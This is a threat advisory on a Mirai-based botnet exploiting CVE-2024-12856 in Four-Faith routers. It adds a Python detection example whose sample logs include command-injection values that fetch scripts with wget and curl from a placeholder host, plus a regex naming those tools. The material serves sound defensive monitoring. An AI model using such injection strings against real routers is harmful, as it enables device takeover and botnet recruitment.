Mirai-Based Botnet Leveraging N-Day and Zero-Day Exploits
September 10th, 2025
High

Our Cyber Threat Intelligence Unit has identified an active Mirai-based botnet campaign that is rapidly expanding across Internet-exposed IoT and network devices. This botnet spreads through weak Telnet credentials and multiple unpatched vulnerabilities, including the zero-day CVE-2024-12856. Successful compromise allows devices to be remotely controlled for DDoS attacks, cryptomining, and further malware deployment. The campaign demonstrates advanced evasion and persistence techniques, including obfuscation, sandbox evasion, and automated restarts if the malware is terminated. These techniques, coupled with the use of zero-day exploits, make detection and removal particularly difficult. With thousands of infected nodes observed globally and confirmed targeting of industries such as manufacturing, technology, and media, this Mirai botnet poses a serious ongoing global threat. Organizations are strongly advised to patch firmware, change default credentials, restrict public exposure, and closely monitor IoT network activity.
Technical Details
Vulnerability ID: CVE-2024-12856
Type: OS Command Injection (Remote Code Execution)
Severity Level: High (CVSS v3 score: 7.2)
Attack Vector: Remote via HTTP
Authentication Required: Yes; devices still using default credentials are, in practice, exploitable without meaningful authentication
Privileges Required: High (admin-level); default credentials can reduce this to effectively unauthenticated exploitation
Vulnerable Components: Four-Faith industrial routers (models F3x24, F3x36), firmware version 2.0
Root Cause: Lack of input validation in the system time modification API

Impact
Device Compromise and Full Control: Successful exploitation (including CVE-2024-12856) allows attackers to execute arbitrary commands and gain root-level access, leading to complete takeover of the affected devices.
Botnet Enrollment and Persistence: Once compromised, devices are integrated into a Mirai-based botnet. The malware disables competing threats, ensuring persistence and maximizing control over infected systems.
DDoS Capabilities: The primary function of the botnet is to launch large-scale Distributed Denial-of-Service (DDoS) attacks, potentially resulting in prolonged service outages, operational disruption, and reputational damage to targeted organizations.
Secondary Malware Deployment: Infected devices may also be leveraged to deploy additional malicious payloads, such as cryptominers (e.g., XMRig), which consume system resources and degrade performance.
Widespread Industry and Geographic Exposure: The campaign has affected industries such as manufacturing, technology, media/communications, and construction, with infections reported across multiple countries, including Brazil, France, Germany, Israel, Mexico, Switzerland, the U.S., and Vietnam.
Operational and Security Risks: Beyond direct exploitation, infected devices may experience network instability, bandwidth exhaustion, and reduced functionality, while also serving as potential pivot points for deeper compromises within enterprise environments.
Detection Method
Device Manipulation: Malicious code may try to change or delete system files on IoT devices to weaken security. It can rapidly terminate other processes to take full control.
Detection: Monitor for unexpected file changes, rapid process kills, or high CPU/memory usage.
Network Abuse: Infected devices may send large volumes of traffic to unusual ports or servers. They may also scan the internet to locate more vulnerable devices.
Detection: Use firewall and traffic monitoring to spot abnormal traffic spikes, repeated scans, or communication with suspicious servers.
Exploitation Attempts: Exploits can be used to take advantage of known vulnerabilities (such as CVE-2024-12856 in Four-Faith routers, described above). Malicious commands (such as wget or curl invocations) may be injected through router or camera web interfaces.
Detection: Apply IDS/IPS signatures and HTTP request monitoring for suspicious exploit activity.
Evasion Techniques: Malicious binaries may be packed in unusual ways (e.g., modified UPX) to avoid analysis. Frequent changes in filenames, domains, and configurations may be used to stay hidden.
Detection: Use endpoint security and sandboxing to flag strange binaries or frequent config changes.
Full Attack Chain Monitoring: The process usually follows this path: Exploit vulnerability → Install malware → Connect to C2 server → Launch DDoS attacks.
Detection: Correlate logs across layers (device, firewall, IDS) to see the full attack flow. Any IoT device making unexpected external connections should be treated as suspicious.
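The following is an added example, not part of the advisory or any vendor's tooling, showing how the two detections above can be applied and correlated: it scans a router web-interface access log for command-injection patterns in request parameters, flags IoT devices that connect to any destination outside an allowlist, and links the two when the egress goes back to the host that sent the exploit attempt. The log formats, the endpoint name /cgi-bin/settime.cgi, and all addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample logs (not from the advisory). /cgi-bin/settime.cgi is a
# hypothetical stand-in for a router's time-setting API; addresses are
# documentation ranges.
HTTP_LOG = """\
2025-09-09T10:01:02Z 203.0.113.10 POST /cgi-bin/settime.cgi year=2025&hour=10
2025-09-09T10:01:05Z 198.51.100.7 POST /cgi-bin/settime.cgi year=2025;wget%20http://198.51.100.7/x.sh
2025-09-09T10:02:11Z 198.51.100.7 POST /cgi-bin/settime.cgi hour=$(curl%20198.51.100.7/a)
2025-09-09T10:02:30Z 203.0.113.10 GET /status.cgi -
"""
# Firewall egress log: timestamp, source, destination, destination port.
FW_LOG = """\
2025-09-09T10:01:20Z 192.0.2.15 198.51.100.7 80
2025-09-09T10:01:40Z 192.0.2.15 192.0.2.1 123
2025-09-09T10:03:00Z 192.0.2.15 203.0.113.50 23
"""

# Shell metacharacters and download tools that have no place in a
# time-setting parameter. A single '&' is a normal query separator, so only
# '&&' is treated as suspicious. Matched after URL decoding.
SHELL_META = re.compile(r";|\||`|&&|\$\(|\b(?:wget|curl|tftp)\b")

def find_injection_attempts(log: str) -> list[tuple[str, str, str]]:
    """Return (timestamp, source IP, decoded params) for suspicious requests."""
    hits = []
    for line in log.splitlines():
        ts, src, _method, _path, params = line.split(maxsplit=4)
        decoded = unquote(params)
        if SHELL_META.search(decoded):
            hits.append((ts, src, decoded))
    return hits

def find_unexpected_egress(log: str, iot_prefix: str, allowed: set[tuple[str, int]]):
    """Flag IoT-subnet devices connecting anywhere other than an allowlisted host:port."""
    alerts = []
    for line in log.splitlines():
        ts, src, dst, port = line.split()
        if src.startswith(iot_prefix) and (dst, int(port)) not in allowed:
            alerts.append((ts, src, dst, int(port)))
    return alerts

def correlate(injections, egress):
    """Egress to a host that also sent an exploit attempt is the strongest signal."""
    attackers = {src for _, src, _ in injections}
    return [e for e in egress if e[2] in attackers]
```

In a real deployment the allowlist would hold the device's NTP server, vendor update host, and management station; everything else an IoT device reaches is, per the guidance above, suspicious on its own.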
Indicators of Compromise

Recommendations
Update Devices: Patch all IoT and network devices to the latest firmware, especially those affected by CVE-2024-12856.
Block Internet Exposure: Do not expose IoT devices directly to the internet; use firewalls or VPNs.
Use Strong Passwords: Remove default/weak credentials and set unique, strong passwords.
Monitor Traffic: Watch for unusual outbound connections or DDoS-related activity.
Turn Off Unused Services: Disable Telnet, SSH, or other remote access features if not required.
Plan for Incidents: Have a DDoS mitigation plan and test your response process.
Replace Old Devices: Retire unsupported or outdated IoT hardware that no longer receives updates.
Conclusion
A Mirai-derived botnet has resurfaced with enhanced capabilities that dramatically raise the stakes for IoT security. It leverages both known (N-day) and zero-day vulnerabilities, most notably CVE-2024-12856, to compromise routers and embedded devices from vendors such as DrayTek, TP-Link, Four-Faith, Raisecom, and Cisco. With over 15,000 active nodes, this botnet has orchestrated DDoS attacks on targets including researchers and has deployed cryptomining payloads such as XMRig. Its advanced evasion tactics include custom file naming, UPX header modification, sandbox detection, and modular behaviors (Monitor, Watchdog, Attacker, Killer). The botnet's global footprint spans countries in the Americas, Europe, and Asia, impacting critical sectors such as manufacturing, technology, construction, and media. This evolution underscores the urgency for organizations to adopt proactive, intelligence-driven defenses, including immediate patching, credential hardening, network segmentation, and IoT monitoring, to guard against this escalating global threat.